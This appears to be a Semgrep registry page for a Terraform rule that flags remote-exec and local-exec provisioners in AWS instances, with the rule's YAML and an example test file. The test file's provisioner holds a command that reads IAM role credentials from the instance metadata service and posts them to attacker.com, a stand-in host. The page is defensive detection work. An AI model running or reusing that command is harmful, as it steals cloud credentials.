terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec
semgrep
Author
unknown
Download Count*
License
Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.
Run Locally
Run in CI
Defintion
rules:
- patterns:
- pattern-either:
- pattern: |
provisioner "remote-exec" {
...
}
- pattern: |
provisioner "local-exec" {
...
}
- pattern-inside: |
resource "aws_instance" "..." {
...
}
id: aws-provisioner-exec
message: Provisioners are a tool of last resort and should be avoided where
possible. Provisioner behavior cannot be mapped by Terraform as part of a
plan, and execute arbitrary shell commands by design.
languages:
- terraform
severity: WARNING
metadata:
category: security
owasp:
- A03:2021 - Injection
- A01:2017 - Injection
cwe:
- "CWE-77: Improper Neutralization of Special Elements used in a Command
('Command Injection')"
- "CWE-94: Improper Control of Generation of Code ('Code Injection')"
subcategory:
- guardrail
confidence: HIGH
likelihood: HIGH
impact: MEDIUM
technology:
- terraform
references:
- https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec
- https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec
license: Commons Clause License Condition v1.0[LGPL-2.1-only]
vulnerability_class:
- Code Injection
- Other
Examples
aws-provisioner-exec.tf
resource "aws_instance" "example" {
ami = "ami-06ca3ca175f37dd66"
instance_type = "t2.micro"
associate_public_ip_address = true
# ruleid: aws-provisioner-exec
provisioner "remote-exec" {
inline = [
"sudo yum install ec2-instance-connect -y",
"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/tf-testing-role > /tmp/awscreds.txt && curl https://attacker.com/creds.php --data-urlencode creds@/tmp/awscreds.txt"
]
}
iam_instance_profile = "tf-testing-role"
connection {
type = "ssh"
user = "ec2-user"
private_key = tls_private_key.this.private_key_openssh
host = self.public_ip
agent = false
}
key_name = aws_key_pair.this.key_name
vpc_security_group_ids = [aws_security_group.example.id]
metadata_options {
http_endpoint = "enabled"
http_tokens = "optional"
http_put_response_hop_limit = 10
}
tags = {
Name = "terraform-testing"
}
}
resource "aws_instance" "example" {
ami = "ami-06ca3ca175f37dd66" // make sure to update this to a valid AMI ID
instance_type = "t2.micro"
associate_public_ip_address = true
iam_instance_profile = "tf-testing-role"
connection {
type = "ssh"
user = "ec2-user"
private_key = tls_private_key.this.private_key_openssh
host = self.public_ip
agent = false
}
key_name = aws_key_pair.this.key_name
vpc_security_group_ids = [aws_security_group.example.id]
metadata_options {
http_endpoint = "enabled"
http_tokens = "optional"
http_put_response_hop_limit = 10
}
tags = {
Name = "terraform-testing"
}
}
Short Link: https://sg.run/7EjQ